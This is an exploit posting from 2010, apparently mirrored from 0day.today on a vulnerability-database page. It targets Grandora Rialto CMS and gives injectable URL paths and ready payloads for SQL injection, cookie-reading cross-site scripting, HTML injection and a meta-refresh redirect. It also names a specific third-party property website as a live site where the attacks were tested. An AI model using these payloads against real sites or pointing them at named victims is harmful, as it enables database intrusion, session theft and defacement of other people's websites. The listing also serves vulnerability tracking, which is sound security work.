Lucene search
K

Grandora Rialto CMS SQLi|XSS|HTML|URL Redirecting Vulnerability

🗓️ 02 Jul 2010 00:00:00Reported by Th3 RDXType 
zdt
 zdt
🔗 0day.today👁 21 Views

Grandora Rialto CMS SQL Injection, Cross-Site Scripting, HTML Injection, URL Redirecting Vulnerabilit

Code
===============================================================
Grandora Rialto CMS SQLi|XSS|HTML|URL Redirecting Vulnerability
===============================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    #####################################             1
0                    I'm Th3 RDX member from Inj3ct0r Team             1
1                    #####################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


# Exploit Title: Grandora Rialto CMS SQLi|XSS|HTML|URL Redirecting Vulnerability
# Date: 1-07-2010
# Author: Th3 RDX
# Software Link:
# Version: 1.0
# Tested on: Demo Site
# category: webapp
# Code :
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 L0v3 To: R00T, R45c4l, Agent: 1c3c0ld, Big Kid, Lucky, r0073r(inj3ct0r.com),
                          Nishi (br0wn_sug4r)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
   RooT Bro waiting for u to come online desperately and missing you alot
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       Gr33tz to ### Team I.C.A | www.IndiShell.in | Team I.C.W ###
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

##############################################################################
%//

----- [ Founder ] -----

        Th3 RDX

----- [ E - mail ] -----

    [email protected]


                                                        %\\
##############################################################################

##############################################################################
%//

----- [Title] -----

Grandora Rialto CMS SQLi|XSS|HTML|URL Redirecting Vulnerability

----- [ Vendor ] -----

http://www.grandora.com/

                                                        %\\
##############################################################################

##############################################################################
%//

----- [ Injection (s) ] -----

----- [ SQL Injection ] -----

Put [SQL CODE]

[XSS] http://server/rialto/listfull.asp?ID=669[SQL CODE]


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

----- [ XSS Injection ] -----

Put [XSS CODE] = <script>alert(document.cookie)</script>

[XSS] http://server/rialto/searchadvanced.asp

      In Box Paste Code: [XSS CODE]

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

----- [ HTML Injection ] -----

Put [HTML CODE] = <marquee><font color=Red size=16>Th3 RDX/font></marquee>

[HTML] http://server/rialto/searchadvanced.asp

     In Box Paste Code: [HTML CODE]

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

----- [ URL Redirecting ] -----

Put [URL CODE] = <HTML><HEAD><TITLE>Redirect...</TITLE><META
HTTP-EQUIV="REFRESH" CONTENT="0;
URL=http://www.google.com"></HEAD><BODY>Redirect in
corso...</BODY></HTML>


[HTML] http://server/rialto/searchadvanced.asp

     In Box Paste Code: [URL CODE]

                                                        %\\
##############################################################################

##############################################################################
%//

              >>>>>> TESTED ON <<<<<<

----- [ Live Link (s) ] -----

[SQLi] http://www.twrightproperties.com/source/listfull.asp?ID=669';

[Link] http://www.twrightproperties.com/source/searchadvanced.asp
       In Box Paste Code: [CODE (XSS + HTML + URL Redirection)]


                                                        %\\
##############################################################################

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  Thanks To All: www.Exploit-db.com | Inj3ct0r Team | www.hack0wn.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=> PROUD TO BE AN INDIAN

=> c0d3 for motherland, h4ck for motherland

==> i'm little more than useless <==
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.

Bug discovered : 1 July 2010

finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

#End 0Day#



#  0day.today [2018-04-14]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Jul 2010 00:00Current
7.1High risk
Vulners AI Score7.1
21